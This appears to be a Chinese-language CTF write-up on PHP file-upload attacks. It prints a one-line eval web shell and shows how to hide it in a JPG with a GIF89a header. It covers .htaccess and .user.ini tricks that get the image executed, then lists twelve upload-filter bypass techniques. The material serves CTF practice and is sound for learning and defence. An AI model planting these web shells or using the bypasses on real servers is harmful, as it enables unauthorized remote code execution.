一句话木马
<?php
@eval($_POST[pass]);
?>
上传一句话木马文件的普通方式都不可以,发现可以上传jpg木马,jpg木马他也进行内容绕过,不能含有<?,但是可以构造其他的,然后还要添加GIF89a进行伪装;
图片马制作
Mac系统和Linux系统
首先在桌面上创建file1.txt并在里面写入一句话木马,下载file2.jpg,
然后,打开终端,cd 到desktop
将file1.txt追加到file2.jpg后面的方法:
cat file1.txt >> file2.jpg
若要将两个文件合并成第三个文件,而不是追加,那么用命令:
cat file1.txt file2.jpg >> file3.jpg
Windows:
创建一个23.txt 文件,在里面写入 一句话木马。然后找一张大小比较小的图片horse.jpg,放在桌面上,然后打开命令行,先cd到Desktop
然后执行
copy horse.jpg/b + 23.txt h123.jpg
新得到的h123.jpg就是图片马了。将图片后缀修改为.txt 打开就可以看到在图片二进制代码的后面追加了一句话木马。
配置文件绕过的两种方法:
1.在apache中,可以用 .htacess文件来实现,可这道题也被正则了
AddType application/x-httpd-php
2.用.user.ini (知识点在参考里面也有);大概就是弄一个.user.ini文件,内容为:
GIF89a
auto_prepend_file=图片木马名称
执行步骤,上传图片木马,上传.user.ini ,连接蚁剑;查看flag;
文件上传木马总结:
1、前端绕过,抓包修改后缀名,
2、文件内容绕过,用图片马,抓包修改后缀绕过(如后缀改php5)
3、黑名单绕过,那么我们可以改成phtml抓包绕过
4、.htaccess绕过,只要有这个配置文件,并且内容为AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)”
5、大小写绕过,抓包后修改后缀为.PHp
6、空格绕过,抓包修改后缀,在后缀后面加上空格
7、点绕过,抓包修改后缀,在后缀后面加上点
8.什么删掉我的空格或者.,那我抓包修改为. .或者 . |
9、文件流绕过,前提条件,必须是window的服务器,抓包修改后缀,并在后缀后面加上::$DATA,
10、双拼绕过,抓包修改后缀,并在把后缀改成phphpp,这样后端去掉php,还剩下个ph和p组合成为php
11.get00截断绕过,把upload/后面加上1.php%00 下面的filename=”1.php”改为1.jpg
12.post00截断绕过,把upload/后面加上1.php+ 再编辑+ 改成十六进制00 下面的filename="1.php”改为1.jpg